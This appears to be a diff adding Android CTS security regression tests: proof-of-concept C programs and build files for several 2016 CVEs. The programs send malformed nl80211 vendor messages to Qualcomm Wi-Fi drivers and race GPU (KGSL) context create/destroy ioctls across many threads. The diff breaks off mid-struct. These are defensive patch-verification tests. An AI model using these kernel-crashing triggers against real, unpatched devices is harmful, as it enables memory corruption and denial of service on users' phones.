+ ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_START,
+ WIFI_OFFLOAD_SUBCMD_STOP_MKEEP_ALIVE,
+ APF_SUBCMD_GET_CAPABILITIES = ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_START,
+ APF_SUBCMD_SET_FILTER,
+ /* Add more sub commands here */
+ VENDOR_SUBCMD_MAX
+};
+
+#define QCA_NL80211_VENDOR_ID 0x001374
+#define QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_PASSPOINT_LIST 70
+#define QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM 1
+#define QCA_NL80211_VENDOR_SUBCMD_PACKET_FILTER 83
+
+#define BPF_SET_RESET 1
+#define BPF_FILTER_ID 3
+#define BPF_PACKET_SIZE 4
+#define BPF_PROGRAM 6
+#define QCA_WLAN_GET_PACKET_FILTER 2
+
+#define GSCAN_ATTRIBUTE_NUM_BUCKETS 10
+#define GSCAN_ATTRIBUTE_CH_BUCKET_1 0
+#define GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS 15
+
+#define RTT_ATTRIBUTE_TARGET_CNT 0
+#define RTT_ATTRIBUTE_TARGET_CHAN 5
+#define RTT_ATTRIBUTE_TARGET_INFO 1
+
+#define GSCAN_ATTRIBUTE_WHITELIST_SSID 80
+#define GSCAN_ATTRIBUTE_NUM_WL_SSID 81
+#define GSCAN_ATTRIBUTE_WHITELIST_SSID_ELEM 84
+typedef int wifi_channel;
+typedef int wifi_channel_width_t;
+typedef struct wifi_channel_info {
+ wifi_channel_width_t width;
+ wifi_channel center_freq; /* primary 20 MHz channel */
+ wifi_channel center_freq0; /* center freq (MHz) first segment */
+ wifi_channel
+ center_freq1; /* center freq (MHz) second segment valid for 80 + 80 */
+} wifi_channel_info_t;
+
+#define GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE 111
+#define GSCAN_ATTRIBUTE_ANQPO_HS_LIST 110
+#define GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID 114
+#define GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM 113
+
+int test(void);
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version);
+
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version) {
+ struct nl_msg *msg;
+ int ret = -1;
+ unsigned char dst[ETH_ALEN];
+ struct nlattr *rret;
+ struct nlattr *rret2;
+ struct nlattr *rret3;
+ struct nlattr *rret4;
+ unsigned char buf_test[256];
+
+ int i = 0;
+
+ wifi_channel_info_t c_info;
+
+ unsigned char hb_params[512];
+#define DOT11_MAX_SSID_LEN 32
+ unsigned char SSID11[DOT11_MAX_SSID_LEN];
+ struct nl80211_sta_flag_update flags;
+ msg = nlmsg_alloc();
+ int if_index = if_nametoindex("wlan0");
+
+#define OUI_GOOGLE 0x001A11
+
+ genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
+
+ nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
+
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, OUI_GOOGLE);
+
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD, GSCAN_SUBCMD_ANQPO_CONFIG);
+
+ rret = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
+
+ if (!rret) {
+ return 1;
+ }
+
+ nla_put_u32(msg, GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE, 1);
+
+ rret2 = nla_nest_start(msg, GSCAN_ATTRIBUTE_ANQPO_HS_LIST);
+
+ if (!rret2) {
+ return 1;
+ }
+
+ for (i = 0; i < 4; ++i) {
+ rret3 = nla_nest_start(msg, GSCAN_ATTRIBUTE_ANQPO_HS_LIST);
+
+ if (!rret3) {
+ return 1;
+ }
+
+ nla_put(msg, GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM, 256, &buf_test);
+ nla_nest_end(msg, rret3);
+ }
+
+ nla_nest_end(msg, rret2);
+
+ nla_nest_end(msg, rret);
+
+ ret = nl_send_auto_complete(nl_sk, msg);
+
+ return 0;
+}
+
+#define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */
+#define AID_NET_RAW 3004 /* can create raw INET sockets */
+#define AID_NET_ADMIN 3005
+
+int test() {
+ int fd = 0;
+ int i = 0;
+ int j = 0;
+ int ret = 0;
+ char *mem;
+ int family_id = 0;
+ struct audio_cal_basic *acb;
+ struct sockaddr_nl saddr;
+ int test = 0x1234;
+
+ gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
+ setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
+
+ setuid(2000);
+
+ nl_sk = nl_socket_alloc();
+ ret = genl_connect(nl_sk);
+ if (ret != 0) {
+ return -1;
+ }
+
+ family_id = genl_ctrl_resolve(nl_sk, "nl80211");
+
+ ret = send_testmode(family_id, getpid(), NL80211_CMD_VENDOR, 1);
+
+ return 0;
+}
+
+int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8476/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8476/Android.mk
new file mode 100644
index 0000000..dee2e39
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8476/Android.mk
@@ -0,0 +1,43 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8476
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES:= \
+ $(TOP)/external/libnl/include/ \
+ $(TOP)/external/libnl/lib/ \
+
+LOCAL_SHARED_LIBRARIES:= libnl
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8476/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8476/poc.c
new file mode 100644
index 0000000..aac5bd7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8476/poc.c
@@ -0,0 +1,206 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <dlfcn.h>
+#include <limits.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <jni.h>
+#include <android/log.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <linux/genetlink.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <sys/types.h> /* See NOTES */
+#include <netlink/msg.h>
+#include <netlink/genl/genl.h>
+#include <netlink/genl/ctrl.h>
+#include <linux/nl80211.h>
+
+#define MAX_MSG_SIZE 1024
+#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
+#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
+
+#define KGSL_IOC_TYPE 0x09
+
+struct kgsl_perfcounter_query_compat {
+ unsigned int groupid;
+ unsigned int countables;
+ unsigned int count;
+ unsigned int max_counters;
+ unsigned int __pad[2];
+};
+struct kgsl_perfcounter_read_group {
+ unsigned int groupid;
+ unsigned int countable;
+ unsigned long long value;
+};
+#define IOCTL_KGSL_PERFCOUNTER_QUERY_COMPAT \
+ _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query_compat)
+
+struct kgsl_perfcounter_read_compat {
+ unsigned int reads;
+ unsigned int count;
+ unsigned int __pad[2];
+};
+
+#define CAL_IOCTL_MAGIC 'a'
+
+#define AUDIO_GET_CALIBRATION _IOWR(CAL_IOCTL_MAGIC, 204, void *)
+
+#define NL80211_ATTR_MAC 6
+#define ETH_ALEN 6
+
+struct nl_sock *nl_sk;
+#define NL80211_ATTR_IFINDEX 3
+enum wlan_hdd_tm_attr {
+ WLAN_HDD_TM_ATTR_INVALID = 0,
+ WLAN_HDD_TM_ATTR_CMD = 1,
+ WLAN_HDD_TM_ATTR_DATA = 2,
+ WLAN_HDD_TM_ATTR_STREAM_ID = 3,
+ WLAN_HDD_TM_ATTR_TYPE = 4,
+ /* keep last */
+ WLAN_HDD_TM_ATTR_AFTER_LAST,
+ WLAN_HDD_TM_ATTR_MAX = WLAN_HDD_TM_ATTR_AFTER_LAST - 1,
+};
+
+enum wlan_hdd_tm_cmd {
+ WLAN_HDD_TM_CMD_WLAN_FTM = 0,
+ WLAN_HDD_TM_CMD_WLAN_HB = 1,
+};
+
+#define SIR_PASSPOINT_REALM_LEN 256
+#define SIR_PASSPOINT_ROAMING_CONSORTIUM_ID_NUM 16
+#define SIR_PASSPOINT_PLMN_LEN 3
+
+#define QCA_NL80211_VENDOR_ID 0x001374
+#define QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_PASSPOINT_LIST 70
+#define QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM 1
+#define QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID 1
+#define QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NETWORK_ARRAY 2
+#define QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_ID 3
+#define QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_REALM 4
+#define QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_ROAM_CNSRTM_ID 5
+#define QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_ROAM_PLMN 6
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version);
+int test(void);
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version) {
+ struct nl_msg *msg;
+ int ret = -1;
+ unsigned char dst[ETH_ALEN];
+ struct nlattr *rret, *rret1, *rret3;
+ unsigned char oper_classes[253];
+ int i = 0;
+ unsigned char data_in[SIR_PASSPOINT_ROAMING_CONSORTIUM_ID_NUM];
+ unsigned char hb_params[512];
+
+ struct nl80211_sta_flag_update flags;
+ msg = nlmsg_alloc();
+ int if_index = if_nametoindex("wlan0");
+
+ genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
+
+ nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, QCA_NL80211_VENDOR_ID);
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD,
+ QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_PASSPOINT_LIST);
+
+ rret = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
+
+ if (!rret) {
+ return 1;
+ }
+
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM, 0XA3D70B);
+
+ rret1 = nla_nest_start(
+ msg, QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NETWORK_ARRAY);
+ if (!rret1) {
+ return 1;
+ }
+
+ rret3 = nla_nest_start(
+ msg, QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NETWORK_ARRAY);
+ if (!rret3) {
+ return 1;
+ }
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_ID, 0x123);
+ nla_put(msg, QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_REALM, 256,
+ &oper_classes);
+ nla_put(msg, QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_ROAM_CNSRTM_ID,
+ sizeof(data_in), &data_in);
+ nla_put(msg, QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_ROAM_PLMN,
+ SIR_PASSPOINT_PLMN_LEN, &data_in);
+
+ nla_nest_end(msg, rret3);
+ nla_nest_end(msg, rret1);
+ nla_nest_end(msg, rret);
+
+ ret = nl_send_auto_complete(nl_sk, msg);
+
+ return 0;
+}
+
+#define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */
+#define AID_NET_RAW 3004 /* can create raw INET sockets */
+#define AID_NET_ADMIN 3005
+
+int test() {
+ int fd = 0;
+ int i = 0;
+ int j = 0;
+ int ret = 0;
+ char *mem;
+ int family_id = 0;
+ struct audio_cal_basic *acb;
+ struct sockaddr_nl saddr;
+ int test = 0x1234;
+ if (getuid() != 0) {
+ return -1;
+ }
+
+ gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
+ setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
+
+ setuid(2000);
+
+ nl_sk = nl_socket_alloc();
+ ret = genl_connect(nl_sk);
+ if (ret != 0) {
+ return -1;
+ }
+
+ family_id = genl_ctrl_resolve(nl_sk, "nl80211");
+
+#define NL80211_CMD_GET_WIPHY 1
+#define NL80211_CMD_SET_STATION 18
+
+ ret = send_testmode(family_id, getpid(), NL80211_CMD_VENDOR, 1);
+ perror("genl_send_msg 2");
+ return 0;
+}
+
+int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8479/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8479/Android.mk
new file mode 100644
index 0000000..f5fbd1a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8479/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8479
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8479/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8479/poc.c
new file mode 100644
index 0000000..94202f6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8479/poc.c
@@ -0,0 +1,186 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define THREAD_NUM 600
+#define DEV "/dev/kgsl-3d0"
+
+/* ioctls */
+#define KGSL_IOC_TYPE 0x09
+
+/* --- context flags --- */
+#define KGSL_CONTEXT_SAVE_GMEM 0x00000001
+#define KGSL_CONTEXT_NO_GMEM_ALLOC 0x00000002
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SUBMIT_IB_LIST 0x00000004
+#define KGSL_CONTEXT_CTX_SWITCH 0x00000008
+#define KGSL_CONTEXT_PREAMBLE 0x00000010
+#define KGSL_CONTEXT_TRASH_STATE 0x00000020
+#define KGSL_CONTEXT_PER_CONTEXT_TS 0x00000040
+#define KGSL_CONTEXT_USER_GENERATED_TS 0x00000080
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_END_OF_FRAME 0x00000100
+#define KGSL_CONTEXT_NO_FAULT_TOLERANCE 0x00000200
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SYNC 0x00000400
+#define KGSL_CONTEXT_PWR_CONSTRAINT 0x00000800
+
+#define KGSL_CONTEXT_PRIORITY_MASK 0x0000F000
+#define KGSL_CONTEXT_PRIORITY_SHIFT 12
+#define KGSL_CONTEXT_PRIORITY_UNDEF 0
+
+#define KGSL_CONTEXT_IFH_NOP 0x00010000
+#define KGSL_CONTEXT_SECURE 0x00020000
+
+#define KGSL_CONTEXT_TYPE_MASK 0x01F00000
+#define KGSL_CONTEXT_TYPE_SHIFT 20
+#define KGSL_CONTEXT_TYPE_ANY 0
+#define KGSL_CONTEXT_TYPE_GL 1
+#define KGSL_CONTEXT_TYPE_CL 2
+#define KGSL_CONTEXT_TYPE_C2D 3
+#define KGSL_CONTEXT_TYPE_RS 4
+#define KGSL_CONTEXT_TYPE_UNKNOWN 0x1E
+
+#define KGSL_CONTEXT_INVALID 0xffffffff
+
+/*
+ * --- command batch flags ---
+ * The bits that are linked to a KGSL_CONTEXT equivalent are either legacy
+ * definitions or bits that are valid for both contexts and cmdbatches. To be
+ * safe the other 8 bits that are still available in the context field should be
+ * omitted here in case we need to share - the other bits are available for
+ * cmdbatch only flags as needed
+ */
+#define KGSL_CMDBATCH_MEMLIST 0x00000001
+#define KGSL_CMDBATCH_MARKER 0x00000002
+#define KGSL_CMDBATCH_SUBMIT_IB_LIST KGSL_CONTEXT_SUBMIT_IB_LIST /* 0x004 */
+#define KGSL_CMDBATCH_CTX_SWITCH KGSL_CONTEXT_CTX_SWITCH /* 0x008 */
+#define KGSL_CMDBATCH_PROFILING 0x00000010
+#define KGSL_CMDBATCH_END_OF_FRAME KGSL_CONTEXT_END_OF_FRAME /* 0x100 */
+#define KGSL_CMDBATCH_SYNC KGSL_CONTEXT_SYNC /* 0x400 */
+#define KGSL_CMDBATCH_PWR_CONSTRAINT KGSL_CONTEXT_PWR_CONSTRAINT /* 0x800 */
+
+/* create a draw context, which is used to preserve GPU state.
+ * The flags field may contain a mask KGSL_CONTEXT_* values
+ */
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id; /*output param */
+};
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+ unsigned int drawctxt_id;
+};
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+ _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+void* child_ioctl_0(void* no_use);
+void* child_ioctl_1(void* no_use);
+void* child_ioctl_2(void* no_use);
+
+int fd;
+unsigned int kgsl_id;
+pthread_t thread_id[THREAD_NUM + 1] = {0};
+int thread_ret[THREAD_NUM] = {0};
+
+static int set_affinity(int num) {
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+void* child_ioctl_0(void* no_use) {
+ int ret = 1;
+ struct kgsl_drawctxt_destroy kdd = {0};
+ kdd.drawctxt_id = kgsl_id;
+ set_affinity(1);
+
+ while (1) {
+ ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &kdd);
+ }
+}
+
+void* child_ioctl_1(void* no_use) {
+ int ret = 1;
+ struct kgsl_drawctxt_destroy kdd = {0};
+ kdd.drawctxt_id = kgsl_id;
+ set_affinity(2);
+
+ while (1) {
+ ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &kdd);
+ }
+}
+
+void* child_ioctl_2(void* no_use) {
+ int ret = 1;
+ struct kgsl_drawctxt_create kdc = {0, 0};
+ kdc.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
+ set_affinity(3);
+ while (1) {
+ ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &kdc);
+ kgsl_id = kdc.drawctxt_id;
+ }
+}
+
+int main() {
+ int i, ret;
+ struct kgsl_drawctxt_create kdc = {0, 0};
+ kdc.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
+ struct kgsl_drawctxt_destroy kdd = {0};
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV, O_RDWR);
+ if (fd == -1) {
+ return 0;
+ }
+
+ /* create thread */
+ for (i = 0; i < 150; i = i + 3) {
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child_ioctl_0, NULL);
+ thread_ret[i + 1] =
+ pthread_create(thread_id + i + 1, NULL, child_ioctl_1, NULL);
+ thread_ret[i + 2] =
+ pthread_create(thread_id + i + 2, NULL, child_ioctl_2, NULL);
+ }
+
+ while (1) {
+ ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &kdc);
+ kgsl_id = kdc.drawctxt_id;
+ }
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8481/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8481/Android.mk
new file mode 100644
index 0000000..a578057
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8481/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8481
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8481/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8481/poc.c
new file mode 100644
index 0000000..bf5f30c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8481/poc.c
@@ -0,0 +1,306 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define THREAD_NUM 1
+#define DEV "/dev/usf1"
+
+/* min, max array dimension */
+#define MIN_MAX_DIM 2
+
+#define USF_MAX_PORT_NUM 8
+
+static const unsigned short PortSamplesDataSize = 768;
+
+/* Encoder (TX), decoder (RX) supported US data formats */
+#define USF_POINT_EPOS_FORMAT 0
+#define USF_RAW_FORMAT 1
+
+/* Indexes of event types, produced by the calculators */
+#define USF_TSC_EVENT_IND 0
+#define USF_TSC_PTR_EVENT_IND 1
+#define USF_MOUSE_EVENT_IND 2
+#define USF_KEYBOARD_EVENT_IND 3
+#define USF_TSC_EXT_EVENT_IND 4
+#define USF_MAX_EVENT_IND 5
+
+/* Types of events, produced by the calculators */
+#define USF_NO_EVENT 0
+#define USF_TSC_EVENT (1 << USF_TSC_EVENT_IND)
+#define USF_TSC_PTR_EVENT (1 << USF_TSC_PTR_EVENT_IND)
+#define USF_MOUSE_EVENT (1 << USF_MOUSE_EVENT_IND)
+#define USF_KEYBOARD_EVENT (1 << USF_KEYBOARD_EVENT_IND)
+#define USF_TSC_EXT_EVENT (1 << USF_TSC_EXT_EVENT_IND)
+#define USF_ALL_EVENTS \
+ (USF_TSC_EVENT | USF_TSC_PTR_EVENT | USF_MOUSE_EVENT | USF_KEYBOARD_EVENT | \
+ USF_TSC_EXT_EVENT)
+void *child_ioctl_0(void *no_use);
+
+/* Info structure common for TX and RX */
+struct us_xx_info_type {
+ /* Input: general info */
+ /* Name of the client - event calculator */
+ const char __user *client_name;
+ /* Selected device identification, accepted in the kernel's CAD */
+ uint32_t dev_id;
+ /* 0 - point_epos type; (e.g. 1 - gr_mmrd) */
+ uint32_t stream_format;
+ /* Required sample rate in Hz */
+ uint32_t sample_rate;
+ /* Size of a buffer (bytes) for US data transfer between the module and USF */
+ uint32_t buf_size;
+ /* Number of the buffers for the US data transfer */
+ uint16_t buf_num;
+ /* Number of the microphones (TX) or speakers(RX) */
+ uint16_t port_cnt;
+ /* Microphones(TX) or speakers(RX) indexes in their enumeration */
+ uint8_t port_id[USF_MAX_PORT_NUM];
+ /* Bits per sample 16 or 32 */
+ uint16_t bits_per_sample;
+ /* Input: Transparent info for encoder in the LPASS */
+ /* Parameters data size in bytes */
+ uint16_t params_data_size;
+ /* Pointer to the parameters */
+ uint8_t __user *params_data;
+ /* Max size of buffer for get and set parameter */
